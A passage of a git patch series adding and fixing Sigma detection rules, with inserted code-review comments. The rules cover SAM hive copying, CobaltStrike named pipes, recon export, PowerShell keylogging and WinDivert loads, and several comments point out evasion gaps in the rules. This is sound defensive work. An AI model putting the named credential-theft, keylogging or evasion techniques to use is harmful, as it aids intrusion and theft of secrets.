@@ -16,68 +16,56 @@ fieldmappings: - process_product_version - process_publisher - process_file_description - DestPort: - - netconn_port - - netconn_remote_port + DestPort: netconn_port Destination: - netconn_domain DestinationAddress: - netconn_domain - netconn_ipv4 - netconn_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - DestinationHostname: + DestinationHostname: - netconn_domain - netconn_proxy_domain DestinationIp: - netconn_ipv4 - netconn_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - DestinationPort: - - netconn_port - - netconn_remote_port + DestinationPort: netconn_port Device: device_name FileName: - - process_internal_name - process_name - process_original_filename FileVersion: process_product_version Image: - process_name - - process_internal_name IntegrityLevel: process_integrity_level IpAddress: - netconn_ipv4 - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 LogonId: - childproc_username - process_username md5: hash - NewName: regmod_new_name + NewName: regmod_name OriginalFileName: process_original_filename ParentCommandLine: parent_cmdline ParentImage: parent_name ParentIntegrityLevel: process_integrity_level ProcessCommandLine: process_cmdline ProcessName: process_name - Product: + Product: - process_product_name - process_file_description RelativeTargetName: childproc_name - ScriptBlockText: + ScriptBlockText: - childproc_cmdline - crossproc_cmdline - process_cmdline ServiceFileName: process_service_name ServiceName: process_service_name sha256: hash - Signature: + Signature: - childproc_publisher - filemod_publisher - modload_publisher 
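Review bot: The rewritten `DestinationHostname:`, `Product:`, `ScriptBlockText:` and `Signature:` lines differ from the removed ones only by a trailing space after the colon, as far as the collapsed diff shows; those four line changes look accidental and add whitespace noise to the config. `NewName: regmod_new_name` becoming `NewName: regmod_name` makes `NewName` and `TargetObject` map to the same field, which presumably loses the distinction for registry rename events; if `regmod_new_name` was removed because EEDR does not expose it, a comment saying so would help. The same `netconn_remote_*` removals recur in the third hunk of this file.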
@@ -98,27 +86,17 @@ fieldmappings: - netconn_local_port - netconn_port SourceWorkstation: device_name - TargetFilename: - - filemod_name - - crossproc_name - TargetImage: - - filemod_name - - crossproc_name - TargetName: - - filemod_name - - crossproc_name + TargetFilename: filemod_name + TargetImage: filemod_name + TargetName: filemod_name TargetUserName: - childproc_username - process_username - TargetObject: - - regmod_name - - regmod_new_name + TargetObject: regmod_name User: - childproc_username - process_username - Value: - - regmod_name - - regmod_new_name + Value: regmod_name Workstation: device_name WorkstationName: device_name @@ -127,15 +105,9 @@ fieldmappings: - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 - dst_port: - - netconn_port - - netconn_remote_port + dst_port: netconn_port src_ip: - netconn_ipv4 - netconn_ipv6 - netconn_local_ipv4 - netconn_local_ipv6 - - netconn_remote_ipv4 - - netconn_remote_ipv6 \ No newline at end of file From d753d9a7fd4d673f85e95527c80ad0bd2404a0f4 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 29 Jul 2021 16:06:45 +0200 Subject: [PATCH 0139/1367] fix: duplicate id and indentation --- rules/cloud/aws_sts_assumedrole_misuse.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/cloud/aws_sts_assumedrole_misuse.yml b/rules/cloud/aws_sts_assumedrole_misuse.yml index 869c4f2d..a4b2c5b9 100644 --- a/rules/cloud/aws_sts_assumedrole_misuse.yml +++ b/rules/cloud/aws_sts_assumedrole_misuse.yml @@ -1,5 +1,5 @@ title: AWS STS AssumedRole Misuse -id: b45ab1d2-712f-4f01-a751-df3826969807 +id: 216e11fa-2796-4fb0-8416-8910b63faec4 description: Identifies the suspicious use of AssumedRole. Attackers could move laterally and escalate privileges. author: Austin Songer status: experimental 
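Review bot: `TargetImage: filemod_name` and `TargetName: filemod_name` in this hunk drop the `crossproc_name` alternative; in Sigma process_access rules `TargetImage` names the process being accessed, for which the cross-process field is presumably the right EEDR mapping, so those rules would now be translated against a file-modification field and likely never match. If `crossproc_name` was removed deliberately, a comment next to `TargetImage` stating the reason would prevent it from being restored, otherwise keep it as a second list entry. `Value: regmod_name` now coincides with `TargetObject: regmod_name` as well, which is worth a note for the same reason.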
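Review bot: The first hunk of this commit rewrites `id:` in rules/cloud/aws_sts_assumedrole_misuse.yml from pre-image blob `869c4f2d`, which is the same pre-image that commit 0136 (index `869c4f2d..75ecc209`) already changed to `905d389b-b853-46d0-9d3d-dea0d3a3cd49`; applied in series order this hunk will not apply, and if it is rebased the two commits assign different UUIDs to the same rule. Pick one of the two ids and drop the other change so the rule ends up with a single stable identifier.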
@@ -17,11 +17,11 @@ detection: condition: selection level: low tags: - - attack.lateral_movement - - attack.privilege_escalation - - attack.t1548 - - attack.t1550 - - attack.t1550.001 + - attack.lateral_movement + - attack.privilege_escalation + - attack.t1548 + - attack.t1550 + - attack.t1550.001 falsepositives: -- AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. -- Automated processes that uses Terraform may lead to false positives. + - AssumedRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. AssumedRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Automated processes that uses Terraform may lead to false positives. From ec9c15226fc94714c8f9ded058b0280ca220956c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 29 Jul 2021 18:12:10 +0200 Subject: [PATCH 0140/1367] SeriousSAM PowerShell rule --- .../win_susp_powershell_sam_access.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_powershell_sam_access.yml diff --git a/rules/windows/process_creation/win_susp_powershell_sam_access.yml b/rules/windows/process_creation/win_susp_powershell_sam_access.yml new file mode 100644 index 00000000..2b0b1ccd --- /dev/null +++ b/rules/windows/process_creation/win_susp_powershell_sam_access.yml 
@@ -0,0 +1,31 @@ +title: PowerShell SAM Copy +id: 1af57a4b-460a-4738-9034-db68b880c665 +description: Detects suspicious PowerShell scripts accessing SAM hives +status: experimental +references: + - https://twitter.com/splinter_code/status/1420546784250769408 +author: Florian Roth +date: 2021/07/29 +tags: + - attack.credential_access + - attack.t1003.002 +logsource: + category: process_creation + product: windows +detection: + selection_1: + CommandLine|contains|all: + - '\HarddiskVolumeShadowCopy' + - 'ystem32\config\sam' + selection_2: + CommandLine|contains: + - 'Copy-Item' + - 'cp $_.' + - 'cpi $_.' + - 'copy $_.' + - '.File]::Copy(' + condition: all of them +falsepositives: + - Some rare backup scenarios + - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs +level: high From 0cbb6f82ad1438f212d5e2062a0b3773a050c916 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 07:11:11 +0200 Subject: [PATCH 0141/1367] CobaltStrike NamedPipe Patterns https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 --- .../sysmon_mal_cobaltstrike_re.yml | 36 +++++++++++++++++++ ...sysmon_susp_cobaltstrike_pipe_patterns.yml | 29 +++++++++++++++ 2 files changed, 65 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml create mode 100644 rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml new file mode 100644 index 00000000..1d4cb892 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
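Review bot: The pattern `'ystem32\config\sam'` in `selection_1` drops the leading character of `System32` without explanation; Sigma string matching is case-insensitive, so the truncation is not needed to cover `system32` versus `System32`, and a reader will wonder whether it is a typo. If there is a reason (a different spelling being targeted), add a comment on the line such as `# leading 'S' dropped on purpose: <reason>`; otherwise `'\System32\config\sam'` is the more precise value. The `falsepositives` entry about scripts fixing HiveNightmare ACLs is useful context and worth keeping.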
@@ -0,0 +1,36 @@ +title: CobaltStrike Named Pipe Pattern Regex +id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a +status: experimental +description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles +references: + - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 +date: 2021/07/30 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' +detection: + selection_re: + PipeName|re: + - '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' + - '\\mojo.5688.8052.35780273329370473[0-9a-f]{2}' + - '\\wkssvc[0-9a-f]{2}' + - '\\ntsvcs[0-9a-f]{2}' + - '\\DserNamePipe[0-9a-f]{2}' + - '\\SearchTextHarvester[0-9a-f]{2}' + - '\\mypipe-f[0-9a-f]{2}' + - '\\mypipe-h[0-9a-f]{2}' + - '\\windows.update.manager[0-9a-f]{2}' + - '\\windows.update.manager[0-9a-f]{3}' + - '\\ntsvcs_[0-9a-f]{2}' + - '\\scerpc_[0-9a-f]{2}' + - '\\scerpc[0-9a-f]{2}' + condition: selection_re +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml new file mode 100644 index 00000000..47711bc8 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml 
@@ -0,0 +1,29 @@ +title: CobaltStrike Named Pipe Patterns +id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 +status: experimental +description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles +references: + - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 +date: 2021/07/30 +author: Florian Roth +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' +detection: + selection_malleable_profiles: + PipeName|startswith: + - '\mojo.5688.8052.183894939787088877' + - '\mojo.5688.8052.35780273329370473' + - '\mypipe-f' + - '\mypipe-h' + - '\ntsvcs_' + - '\scerpc_' + condition: 1 of them +falsepositives: + - Chrome instances using the exactly same name pipe named mojo.something +level: high From 096395a49ac6910b6a437963cb3e4f04c8485d98 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 07:19:42 +0200 Subject: [PATCH 0142/1367] fix: one condition style error --- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 47711bc8..c9a3da84 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml 
@@ -23,7 +23,7 @@ detection: - '\mypipe-h' - '\ntsvcs_' - '\scerpc_' - condition: 1 of them + condition: selection_malleable_profiles falsepositives: - Chrome instances using the exactly same name pipe named mojo.something level: high From eff6b50a8994fd5e11f6b4ae5293b5c35febc44f Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:15:13 +0200 Subject: [PATCH 0143/1367] add process_creation_susp_recon.yml --- .../process_creation_susp_recon.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_susp_recon.yml diff --git a/rules/windows/process_creation/process_creation_susp_recon.yml b/rules/windows/process_creation/process_creation_susp_recon.yml new file mode 100644 index 00000000..c0cd5a8d --- /dev/null +++ b/rules/windows/process_creation/process_creation_susp_recon.yml @@ -0,0 +1,27 @@ +title: Recon Information for Export with Command Prompt +id: aa2efee7-34dd-446e-8a37-40790a66efd7 +status: experimental +author: frack113 +date: 2021/07/30 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + category: process_creation +detection: + selection_image: + Image|endswith: + - '\tree.com' + - '\WMIC.exe' + - '\doskey.exe' + - '\sc.exe' + selection_redirect: + ParentCommandLine|contains: ' > %TEMP%\' + condition: selection_image and selection_redirect +falsepositives: + - Unknown +level: medium From 38ede57cb40e614094828b05bed46dfa721f3757 Mon Sep 17 00:00:00 2001 
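Review bot: `selection_redirect` keys on the literal text ` > %TEMP%\` in `ParentCommandLine`, which is only present when the parent was launched as `cmd /c ... > %TEMP%\...` with the variable still unexpanded; the same recon typed into an interactive cmd session spawns `tree.com` with the interactive shell's plain command line and produces no match, and scripts that redirect to an already-expanded `\AppData\Local\Temp\` path are missed as well. A second selection for the expanded form, ANDed with a redirect marker, narrows that gap without widening the `Image` match.
```yaml
    selection_redirect:
        ParentCommandLine|contains: ' > %TEMP%\'
    selection_redirect_expanded:
        ParentCommandLine|contains|all:
            - ' > '
            - '\AppData\Local\Temp\'
    condition: selection_image and (selection_redirect or selection_redirect_expanded)
```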
From: frack113 Date: Fri, 30 Jul 2021 08:20:51 +0200 Subject: [PATCH 0144/1367] add powershell_suspicious_recon.yml --- .../powershell_suspicious_recon.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_suspicious_recon.yml diff --git a/rules/windows/powershell/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_suspicious_recon.yml new file mode 100644 index 00000000..78368cdf --- /dev/null +++ b/rules/windows/powershell/powershell_suspicious_recon.yml @@ -0,0 +1,29 @@ +title: Recon Information for Export with PowerShell +id: a9723fcc-881c-424c-8709-fd61442ab3c3 +status: experimental +author: frack113 +date: 2021/07/30 +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md +tags: + - attack.collection + - attack.t1119 +logsource: + product: windows + service: powershell + definition: 'Script block logging must be enabled' +detection: + selection_eventid: + EventID: 4104 + selection_action: + ScriptBlockText|contains: + - 'Get-Service ' + - 'Get-ChildItem ' + - 'Get-Process ' + selection_redirect: + ScriptBlockText|contains: '> $env:TEMP\' + condition: all of them +falsepositives: + - Unknown +level: medium From 5947dddcd29b4e38205b63b2d8f5615f9c198c22 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:24:06 +0200 Subject: [PATCH 0145/1367] feat: print the faulty rule as an error into cmdline --- tests/test-merge.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/tests/test-merge.sh b/tests/test-merge.sh index 0e5075eb..86dc48d0 100755 --- a/tests/test-merge.sh +++ b/tests/test-merge.sh @@ -7,6 +7,7 @@ do echo -n . if ! $COVERAGE run -a --include=tools/* tools/merge_sigma $f > /dev/null then + echo "[ERROR] Error in file $f" exit 1 fi done 
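Review bot: `selection_action` matches only the long cmdlet names `Get-Service `, `Get-ChildItem ` and `Get-Process `, while event 4104 records the script block text verbatim, so the built-in aliases (`gsv`, `gci`/`ls`/`dir`, `gps`/`ps`) slip past with no change in behaviour; `selection_redirect` likewise only recognises the `>` operator and not `| Out-File $env:TEMP\...` or `| Set-Content $env:TEMP\...`. Adding the aliases to `selection_action` and e.g. `'Out-File $env:TEMP\'` / `'Set-Content $env:TEMP\'` to `selection_redirect` closes the obvious one-token evasions; if that is deliberately out of scope, say so in `description` so the coverage is documented. `Get-ChildItem > $env:TEMP\` is also common in benign admin scripts, which belongs under `falsepositives` rather than `Unknown`.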
From ab16490d330e7ba72f25262cfce84ea6889143d7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:24:41 +0200 Subject: [PATCH 0146/1367] fix: re CS rule --- .../sysmon_mal_cobaltstrike_re.yml | 31 +++++++++---------- 1 file changed, 15 insertions(+), 16 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 1d4cb892..97b9e587 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml 
@@ -15,22 +15,21 @@ logsource: category: pipe_created definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' detection: - selection_re: - PipeName|re: - - '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' - - '\\mojo.5688.8052.35780273329370473[0-9a-f]{2}' - - '\\wkssvc[0-9a-f]{2}' - - '\\ntsvcs[0-9a-f]{2}' - - '\\DserNamePipe[0-9a-f]{2}' - - '\\SearchTextHarvester[0-9a-f]{2}' - - '\\mypipe-f[0-9a-f]{2}' - - '\\mypipe-h[0-9a-f]{2}' - - '\\windows.update.manager[0-9a-f]{2}' - - '\\windows.update.manager[0-9a-f]{3}' - - '\\ntsvcs_[0-9a-f]{2}' - - '\\scerpc_[0-9a-f]{2}' - - '\\scerpc[0-9a-f]{2}' - condition: selection_re + selection: + - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' + - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}' + - PipeName|re: '\\wkssvc[0-9a-f]{2}' + - PipeName|re: '\\ntsvcs[0-9a-f]{2}' + - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' + - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' + - PipeName|re: '\\mypipe\-f[0-9a-f]{2}' + - PipeName|re: '\\mypipe\-h[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' + - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' + - PipeName|re: '\\scerpc_[0-9a-f]{2}' + - PipeName|re: '\\scerpc[0-9a-f]{2}' + condition: selection falsepositives: - Unknown level: critical From e33ec91b9aec51868d6ea0d3275a1abb353af428 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:28:19 +0200 Subject: [PATCH 0147/1367] add powershell_keylogging.yml --- .../powershell/powershell_keylogging.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_keylogging.yml 
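Review bot: None of the regexes are anchored, so `\\ntsvcs[0-9a-f]{2}` also matches a pipe name that merely contains `\ntsvcs` followed by two hex characters of a longer suffix, and `\\windows\.update\.manager[0-9a-f]{2}` already matches everything the `{3}` variant does, making that entry redundant. Anchoring each pattern, e.g. `'^\\ntsvcs[0-9a-f]{2}$'`, pins the match to the documented two- or three-character suffix and keeps the two `windows.update.manager` entries distinct. How `re` is applied differs per backend (Elasticsearch's regexp query is implicitly full-match, Splunk's `regex` is not, as far as I recall), so explicit anchors also make the intent portable.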
diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_keylogging.yml new file mode 100644 index 00000000..a3e3679e --- /dev/null +++ b/rules/windows/powershell/powershell_keylogging.yml @@ -0,0 +1,29 @@ +title: Powershell Keylogging +id: 34f90d3c-c297-49e9-b26d-911b05a4866c +status: experimental +author: frack113 +date: 2021/07/30 +description: Adversaries may log user keystrokes to intercept credentials as the user types them. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1 +tags: + - attack.collection + - attack.t1056.001 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_basic: + ScriptBlockText|contains: 'Get-Keystrokes' + selection_high: # want to run in backgroud and keybord + ScriptBlockText|contains|all: + - 'Get-ProcAddress user32.dll GetAsyncKeyState' + - 'Get-ProcAddress user32.dll GetForegroundWindow' + condition: selection_id and (selection_basic or selection_high) +falsepositives: + - Unknown +level: medium From dfa28944d04d7615908c1b09e986123555a8e7a5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:31:37 +0200 Subject: [PATCH 0148/1367] update ref in sysmon_creation_mavinject_dll.yml --- .../windows/process_creation/sysmon_creation_mavinject_dll.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml b/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml index c55cfa29..b0a3401c 100644 --- a/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml +++ b/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml 
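Review bot: The first reference points at the atomic page for T1218 (signed binary proxy execution), which is unrelated to keystroke capture and looks carried over from the mavinject rule; the rule is tagged `attack.t1056.001`, so it should be `https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md`. `selection_high` also reproduces the exact `Get-ProcAddress user32.dll GetAsyncKeyState` text of Get-Keystrokes.ps1, so any other P/Invoke spelling of the same API (an `Add-Type` signature or `[user32]::GetAsyncKeyState`) is not covered — either loosen it to `GetAsyncKeyState`/`GetForegroundWindow` or state in `description` that only that script is covered. The inline comment has two typos: `# want to run in background and keyboard`.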
@@ -6,9 +6,12 @@ date: 2021/07/12 description: Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md tags: - attack.defense_evasion + - attack.collection - attack.t1218 + - attack.t1056.004 logsource: category: process_creation product: windows From ccaffc79f7c5be8aec26bce30310d3ec82cc751c Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 30 Jul 2021 08:40:21 +0200 Subject: [PATCH 0149/1367] update ref win_susp_psr_capture_screenshots.yml --- .../process_creation/win_susp_psr_capture_screenshots.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml b/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml index cae1a0a4..aa550b3e 100644 --- a/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml +++ b/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml @@ -5,6 +5,7 @@ description: The psr.exe captures desktop screenshots and saves them on the loca references: - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md author: Beyu Denis, oscd.community date: 2019/10/12 modified: 2020/08/28 From 9131ed6db513faf8697964560358e27d8353f37f Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 30 Jul 2021 12:36:05 +0545 Subject: [PATCH 0150/1367] Added rule for Cabinet file expansion --- .../sysmon_expand_cabinet_files.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_expand_cabinet_files.yml 
diff --git a/rules/windows/process_creation/sysmon_expand_cabinet_files.yml b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml new file mode 100644 index 00000000..8b9f3f8b --- /dev/null +++ b/rules/windows/process_creation/sysmon_expand_cabinet_files.yml @@ -0,0 +1,34 @@ +title: Cabinet File Expansion +status: experimental +id: 9f107a84-532c-41af-b005-8d12a607639f +author: Bhabesh Raj +date: 2021/07/30 +description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack +references: + - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll +tags: + - attack.execution + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: + - '\expand.exe' + CommandLine|contains: + - '.cab' + - '/F:' + - 'C:\ProgramData\' #Suspicious paths to curb FPs if any + - 'C:\Public\' + - '\AppData\Local\Temp\' + - '\AppData\Roaming\Temp\' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage +level: medium \ No newline at end of file From 917b95d8ffdf81bb7e93b3aa5b80f3a996a72bd3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 08:51:38 +0200 Subject: [PATCH 0151/1367] fix: bash script bug --- tests/test-merge.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/test-merge.sh b/tests/test-merge.sh index 86dc48d0..14dadf71 100755 --- a/tests/test-merge.sh +++ b/tests/test-merge.sh @@ -7,7 +7,7 @@ do echo -n . if ! $COVERAGE run -a --include=tools/* tools/merge_sigma $f > /dev/null then - echo "[ERROR] Error in file $f" + echo "[ERROR] Error in file " $f exit 1 fi done From f9aff7d4037726b042871af2a11a9538b952cd0c Mon Sep 17 00:00:00 2001 
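Review bot: A plain list under `CommandLine|contains` is an OR, so the rule fires on any `expand.exe` run whose command line contains `.cab`, or `/F:`, or one of the four paths — the paths therefore do not "curb FPs" as the inline comment intends but widen the match to every expand invocation touching `\AppData\Local\Temp\`, cab or not. If the intent is cab extraction combined with a suspicious location, the values need to be split into two selections that are ANDed in `condition`. Separately, `'C:\Public\'` is not a standard Windows directory; the shared profile lives at `C:\Users\Public\`, so `'\Users\Public\'` is almost certainly what was meant.
```yaml
    selection:
        Image|endswith: '\expand.exe'
        CommandLine|contains:
            - '.cab'
            - '/F:'
    selection_path:
        CommandLine|contains:
            # … unchanged: the four suspicious paths (with C:\Public\ corrected to \Users\Public\) …
    condition: selection and selection_path
```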
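Review bot: Dropping the quotes around `$f` introduces the problem the commit message claims to fix: `"[ERROR] Error in file $f"` was a correct interpolation in any POSIX shell, whereas the new bare `$f` is subject to word splitting and pathname expansion, so a rule path containing a space (this series itself creates `sysmon_vuln_dell_driver_load copy.yml`) is now printed as separate words. Unless the bug being fixed is something not visible in this hunk, keep the quoting and send the diagnostic to stderr so it survives callers that discard stdout: `echo "[ERROR] Error in file $f" >&2`. The surrounding `for` loop starts outside the hunk.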
From: frack113 Date: Fri, 30 Jul 2021 16:02:38 +0200 Subject: [PATCH 0152/1367] fix product sysmon_apt_sourgrum.yml --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 1a6c50cd..5cfbb594 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -9,14 +9,15 @@ references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ date: 2021/06/15 +modified: 2021/07/30 tags: - attack.t1546 - attack.t1546.015 - attack.persistence - attack.privilege_escalation logsource: + product: windows category: process_creation - product: sysmon detection: selection1: Image|contains: 'windows\system32\Physmem.sys' From 6cd2e26fa0023878718752f7fc44f688f349d48c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 30 Jul 2021 16:54:29 +0200 Subject: [PATCH 0153/1367] rule: WinDivert driver load --- .../sysmon_vuln_dell_driver_load copy.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml new file mode 100644 index 00000000..b462fc2f --- /dev/null +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml 
@@ -0,0 +1,26 @@ +title: WinDivert Driver Load +id: 679085d5-f427-4484-9f58-1dc30a7c426d +status: experimental +description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows +author: Florian Roth +date: 2021/07/30 +references: + - https://reqrypt.org/windivert-doc.html + - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ +tags: + - attack.collection + - attack.defense_evasion + - attack.t1599.001 + - attack.t1557.001 +logsource: + category: driver_load + product: windows +detection: + selection: + ImageLoaded|contains: + - '\WinDivert.sys' + - '\WinDivert64.sys' + condition: selection +falsepositives: + - legitimate WinDivert driver usage +level: high From a04aa6ac49b0f72dd0735c135be635fd07c7aad5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 31 Jul 2021 10:18:21 +0200 Subject: [PATCH 0154/1367] rule: ADCSPwn --- .../process_creation/win_hack_adcspwn.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/win_hack_adcspwn.yml diff --git a/rules/windows/process_creation/win_hack_adcspwn.yml b/rules/windows/process_creation/win_hack_adcspwn.yml new file mode 100644 index 00000000..fcaa5c41 --- /dev/null +++ b/rules/windows/process_creation/win_hack_adcspwn.yml @@ -0,0 +1,22 @@ +title: ADCSPwn Hack Tool +id: 